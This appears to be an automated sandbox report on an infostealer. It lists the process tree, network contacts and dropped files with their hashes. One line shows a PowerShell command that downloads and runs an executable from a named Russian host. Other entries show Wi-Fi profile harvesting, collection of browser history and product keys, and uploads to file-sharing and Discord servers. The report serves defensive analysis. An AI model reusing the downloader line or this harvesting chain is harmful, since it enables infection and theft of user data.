"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4420 --field-trial-handle=1836,i,8065625511859414642,18076420440458594363,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4404 --field-trial-handle=1836,i,8065625511859414642,18076420440458594363,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4756 --field-trial-handle=1836,i,8065625511859414642,18076420440458594363,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4812 --field-trial-handle=1836,i,8065625511859414642,18076420440458594363,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4088 --field-trial-handle=1836,i,8065625511859414642,18076420440458594363,131072 /prefetch:1

C:\Windows\System32\NOTEPAD.EXE

"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\xuilo.bat

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\xuilo.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'http://a0995400.xsph.ru/build.exe' -OutFile 'C:\Users\Admin\hueta.exe'"

C:\Users\Admin\hueta.exe

"hueta.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show profile

C:\Windows\SysWOW64\findstr.exe

findstr All

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp8054.tmp.bat

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\taskkill.exe

TaskKill /F /IM 2748

C:\Windows\SysWOW64\timeout.exe

Timeout /T 2 /Nobreak

Network

Country Destination Domain Proto
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 196.187.250.142.in-addr.arpa udp
GB 142.250.179.238:443 play.google.com udp
GB 142.250.187.238:443 clients2.google.com udp
N/A 224.0.0.251:5353 udp
GB 142.250.187.238:443 clients2.google.com tcp
RU 141.8.192.58:80 a0995400.xsph.ru tcp
RU 141.8.192.58:80 a0995400.xsph.ru tcp
RU 141.8.192.58:80 a0995400.xsph.ru tcp
US 162.159.128.233:443 discord.com tcp
BE 88.221.83.185:443 www.bing.com tcp
BE 104.68.66.114:443 cxcs.microsoft.net tcp
US 104.16.184.241:80 icanhazip.com tcp
US 104.16.184.241:80 icanhazip.com tcp
FR 151.80.29.83:443 api.gofile.io tcp
US 206.168.190.239:443 store9.gofile.io tcp
GB 2.18.66.81:443 tcp
GB 2.18.66.81:443 tcp
BE 2.17.107.113:443 r.bing.com tcp
BE 2.17.107.113:443 r.bing.com tcp
BE 2.17.107.113:443 r.bing.com tcp
BE 2.17.107.113:443 r.bing.com tcp
BE 2.17.107.113:443 r.bing.com tcp
BE 2.17.107.113:443 r.bing.com tcp
US 52.168.117.168:443 browser.pipe.aria.microsoft.com tcp
US 104.16.184.241:80 icanhazip.com tcp
US 162.159.128.233:443 discord.com tcp

Files

\??\pipe\crashpad_2444_YTJLOCJPIEOYQFDT

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 2548eb8c1d35694e8966d9666dc3dfee
SHA1 daa809a74df5d99a239edaac9b9e6a9c7e1a5206
SHA256 921cb8b9f86d083cb039048b4896a693a98e43c71d5a1487c418e2eb13565214
SHA512 dfd2b7052348d398091e8051073beac460e4d16d93708800985fe2b21a3b42071b97eab12de1cd7d59c58ece9544a95fb5fdc368a71f7d7ec1fa2b5cb3e51c9a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 1cfa7c5789d27336c9228d671d9b7fb3
SHA1 f93a8b727c5229911cf064ed94158a683870646a
SHA256 6590d357cdba66c89c880a51e0e3f359311ac1552964d8f3b0ae8c25e8a410e5
SHA512 3d542a6bb0d3be1cc77eaad093b401caf6656b38b1aa53ac5133eccc6027636517ebe360d113650d55ac62ae60a74ed7e1e7cb12ed42797bed22bf207257e9b8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 07863a638e4edceeec7e1c7245ea95ef
SHA1 2c3a832719cbd71a6ea8946055aa0cb0f7807334
SHA256 762990f4d5e21c1a1e0d76d7e162d60fe7607b5fbb38c620be7b673313e9a6f0
SHA512 2221cd5a8738828a3d19e92f277e82fb8c956d612b0cc7ae82ab6794a5dd4a52ce7306e29a83b8f8fe9d679ab697b4ef7c021201c40ff325dc1380e34d6d93b4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 fa7920e81609025737053082c5f3980b
SHA1 85c802031a4a0f5672af13bab3b0cd25aaf5e28d
SHA256 4b59c2b069f0c465657e6c1864abc0e019216711b7850bbbfd194a816466f663
SHA512 43176b8c1dc0efafff0e20071dd85f5ccfdc12262adcbe3cab6a0d25923f6299740fae418158d83bdb6e73fa559cfb710fb480dcb165c49564349813c6399e41

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 6732ca87423453bf50175a36208603ea
SHA1 3be5940007a7a095710d37dec0fc8db114bdebde
SHA256 357717556bb285ac5ff6ab4d13b19bfea9d669cd26510bd26c97ca49d462eba1
SHA512 e13e818c86db3cf58ae802d7ea2ee167ea8a6b6ee9d9dec636f132548ac9d368245c1e94190f281c96f0ca93eb2bfbf81f514f2b71aa11465ad54bf054746f9e

C:\Users\Admin\Desktop\xuilo.bat

MD5 da998c01c00c5e035d74cdbe8a18bb2a
SHA1 4888abb2189e7a903d074edb9ea2420b951b6e00
SHA256 63bf72b1c107017c7802cc0f5ddf34fb1a6bc0d15995bab22d2eb2302040dac7
SHA512 127bddc3d40193f28d780bcef0172be22ac875cbf0d2a026ac7ab4a385c05a7a158398aa02fc0dce653318ee7d32782eb66d08d3fa38d15027edabc1ca02fb67

memory/2800-88-0x00000201FE9F0000-0x00000201FEA12000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l5v43rrg.105.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\hueta.exe

MD5 b7cd25bfc3fd117f4a0c2ce2843610b3
SHA1 8320e0c9fca5bf4459e85da1dcc334200a35e230
SHA256 cae90a60fe58dbafcb701b561b1be2be5b045549089b441dd75885828d6130ed
SHA512 23519c0fc7f1a6831290ef3e7a24e580fb01e0e6641167ca2ad8704a2e59199e6c7914ee08b3bab9c188d98cb07b0f9e26642ce93b9802acf472c0ef74a441fb

memory/2748-98-0x0000000000B60000-0x0000000000CF2000-memory.dmp

memory/2748-99-0x00000000057A0000-0x0000000005806000-memory.dmp

memory/2748-102-0x0000000005BD0000-0x0000000005C62000-memory.dmp

memory/2748-103-0x0000000005C60000-0x0000000005C86000-memory.dmp

memory/2748-104-0x0000000003330000-0x0000000003338000-memory.dmp

memory/2748-105-0x0000000006BB0000-0x0000000006BBA000-memory.dmp

memory/2748-106-0x0000000006BC0000-0x0000000006BC8000-memory.dmp

memory/2748-107-0x0000000006BE0000-0x0000000006BFE000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History

MD5 13ecbe1fbaf78a6222d4ec0ab7cca29a
SHA1 550da0da9128b7311afced55ff3dd7857cc2abeb
SHA256 91d5c56d7b3fe8823189603af05f38e37a0e3dfd398275a263efe627832ed57d
SHA512 7e5449610c2ce2657d1adb88b1d2b00a0fc59e4ddf26483ee0b0e918d795121a1e88b409723821e05bcd41ae1a7faebe0575631fc4965f515dbed97c0f61cdf4

C:\Users\Admin\AppData\Local\a40df7b77d99f8e40719ee858fb8ad1d\Admin@NIOJEVYY_en-US\Browsers\Firefox\Bookmarks.txt

MD5 2e9d094dda5cdc3ce6519f75943a4ff4
SHA1 5d989b4ac8b699781681fe75ed9ef98191a5096c
SHA256 c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142
SHA512 d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

memory/2748-167-0x0000000006FA0000-0x0000000007032000-memory.dmp

memory/2748-172-0x0000000007A40000-0x0000000007FE6000-memory.dmp

C:\Users\Admin\AppData\Local\a40df7b77d99f8e40719ee858fb8ad1d\Admin@NIOJEVYY_en-US\System\Apps.txt

MD5 0ad78b5fcadbd4a1c881770ca007bb52
SHA1 fec36bbb97adc61a8942abb87d6de8e695d73d3c
SHA256 fc06b36f5f2bc38b02fe10132ed790002c188a545db132a47b92168788a7e195
SHA512 3027bfb5fd96a58814abb39e75c08038783cf43593fd28ea49b6261dff962d297db7c4330ae3f2cdc3ef5db7b50af7fb0700d1e7cc5adaa95c42adb28b577db8

C:\Users\Admin\AppData\Local\a40df7b77d99f8e40719ee858fb8ad1d\Admin@NIOJEVYY_en-US\System\Apps.txt

MD5 2af0807d39e5bfc32f5bd1e3881f0903
SHA1 9fc4a5e62f81c226b623d6daa66c3e2a8949ba9a
SHA256 a20dff2eb5c112f7483b6760eb5408fda5702d659001a521811e2e0e877f9f20
SHA512 420c93ebfa4d2d2f3321bf3d4ada8f8d1d2377f437e4ae98d06b8898cac1a04fa1bc00840af797dc106062a76f734a7366062b9633aea867a9db8b3e393d6bfa

C:\Users\Admin\AppData\Local\a40df7b77d99f8e40719ee858fb8ad1d\Admin@NIOJEVYY_en-US\System\Process.txt

MD5 6a43c510d11e5fe7dc441a66363070d0
SHA1 403977121eadd96a14572a73d8241c6052985870
SHA256 5dff432a808360b35e54296fb1a04d48cfae466c97e655ced1a1aefd2e99f8d2
SHA512 331e1b4c690522fcec967810596f07e6e2a5d98d2651888137ea3bbf6171bbffdb526819367dff2ed031f70b9f7669c6c87d0cb7d36ce7dba20957496c1eea9b

memory/2748-308-0x0000000006D70000-0x0000000006DEA000-memory.dmp

memory/2748-390-0x0000000007040000-0x00000000070F2000-memory.dmp

C:\Users\Admin\AppData\Local\a40df7b77d99f8e40719ee858fb8ad1d\Admin@NIOJEVYY_en-US\System\ProductKey.txt

MD5 71eb5479298c7afc6d126fa04d2a9bde
SHA1 a9b3d5505cf9f84bb6c2be2acece53cb40075113
SHA256 f6cadfd4e4c25ff3b8cffe54a2af24a757a349abbf4e1142ec4c9789347fe8b3
SHA512 7c6687e21d31ec1d6d2eff04b07b465f875fd80df26677f1506b14158444cf55044eb6674880bd5bd44f04ff73023b26cb19b8837427a1d6655c96df52f140bd

C:\Users\Admin\AppData\Local\a40df7b77d99f8e40719ee858fb8ad1d\Admin@NIOJEVYY_en-US\System\Debug.txt

MD5 b2ddc6c3596351b4268a155663eea720
SHA1 46c04d19850ed693dfd89a4a9a9e10f1ab4d8d2a
SHA256 1074e6433f07546582505d70722a47c9d36c3274bc3d1b3bae97b96fef16f448
SHA512 fc5e552c8612779e3656e5462476e6df8df0b77fa14e99f90d142b8f792dc2c88a21b9663a9b8cb54ca2feb9f5d41a46439b3b30b0ea128da2612988b2c2d771

C:\Users\Admin\AppData\Local\a40df7b77d99f8e40719ee858fb8ad1d\Admin@NIOJEVYY_en-US\Browsers\Google\History.txt

MD5 baf1f11cc346ec6b9e7465ada4ecf4ea
SHA1 926ac4d4abd04e1efa36b52de0d471687076d60c
SHA256 5e31a948c8f81ab293526901a6c646db649651139aa5aa8bb46b53e3f5b116cf
SHA512 94eaab949a1905ec6161cebf330607820182920b9b544eb6dcf82650f2d961f49053addb23fe339366ca6d8025e71c09296edff9781e0b51c1a79122f4351d76

C:\Users\Admin\AppData\Local\a40df7b77d99f8e40719ee858fb8ad1d\Admin@NIOJEVYY_en-US\Directories\Videos.txt

MD5 1fddbf1169b6c75898b86e7e24bc7c1f
SHA1 d2091060cb5191ff70eb99c0088c182e80c20f8c
SHA256 a67aa329b7d878de61671e18cd2f4b011d11cbac67ea779818c6dafad2d70733
SHA512 20bfeafde7fec1753fef59de467bd4a3dd7fe627e8c44e95fe62b065a5768c4508e886ec5d898e911a28cf6365f455c9ab1ebe2386d17a76f53037f99061fd4d

C:\Users\Admin\AppData\Local\a40df7b77d99f8e40719ee858fb8ad1d\Admin@NIOJEVYY_en-US\Directories\Startup.txt

MD5 68c93da4981d591704cea7b71cebfb97
SHA1 fd0f8d97463cd33892cc828b4ad04e03fc014fa6
SHA256 889ed51f9c16a4b989bda57957d3e132b1a9c117ee84e208207f2fa208a59483
SHA512 63455c726b55f2d4de87147a75ff04f2daa35278183969ccf185d23707840dd84363bec20d4e8c56252196ce555001ca0e61b3f4887d27577081fdef9e946402

C:\Users\Admin\AppData\Local\a40df7b77d99f8e40719ee858fb8ad1d\Admin@NIOJEVYY_en-US\Directories\OneDrive.txt

MD5 966247eb3ee749e21597d73c4176bd52
SHA1 1e9e63c2872cef8f015d4b888eb9f81b00a35c79
SHA256 8ddfc481b1b6ae30815ecce8a73755862f24b3bb7fdebdbf099e037d53eb082e
SHA512 bd30aec68c070e86e3dec787ed26dd3d6b7d33d83e43cb2d50f9e2cff779fee4c96afbbe170443bd62874073a844beb29a69b10c72c54d7d444a8d86cfd7b5aa

memory/2748-393-0x0000000006E90000-0x0000000006EB2000-memory.dmp

memory/2748-394-0x0000000008480000-0x00000000087D7000-memory.dmp

C:\Users\Admin\AppData\Local\a40df7b77d99f8e40719ee858fb8ad1d\msgid.dat

MD5 fc5c3c46ece81eef5778d85847367b85
SHA1 f8fdbe12e3394a85a14a6355b14ce51d61a4ec81
SHA256 397d0ff82bc858616be1749ac336eb66c4f75fa63f33617642d31350cdf39b9a
SHA512 3666626aa48746e561cf270e931ef153127f1ef4e4ede9988bc0b450741275cbc9701c4687396e210f87d423ec950d160152de24b88c9c90c086f9e381558ab9

C:\Users\Admin\AppData\Local\Temp\tmp8054.tmp.bat

MD5 bf5fc08855d7b167cdd5b2c6440e9b37
SHA1 6c5ef3fbaa353dc4ae1974a4b697fb9fde69c579
SHA256 de96a8eb8c2a23644300025d2a7b25957e86b6cb46a5ac1f8545879d04ddecb2
SHA512 1a2f0b0d5fed2f05e986b71b33e996a522b807acbeb4906252c47e06213d991f659fea28c7a2b5733b5ae4415124da108b4a4e66ea65f9b958df3ad356935f85

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 b4c8f6f45b1586ecfe59d33a52fe5057
SHA1 54b36addc4fe5a3f8ba32fa5261c9cdeaca40405
SHA256 adbb50920ac08818487782617d120fdb1502cf30749729c1991397f9a959967e
SHA512 501b534b62e201810d4d3625730ea8b8f6903722f3f7fa483f61ec882bcc8d2cf2bdfeaf7b494e46ec77e17fb1823f128d08c1dafe9700b83699fe95a1fe8fb7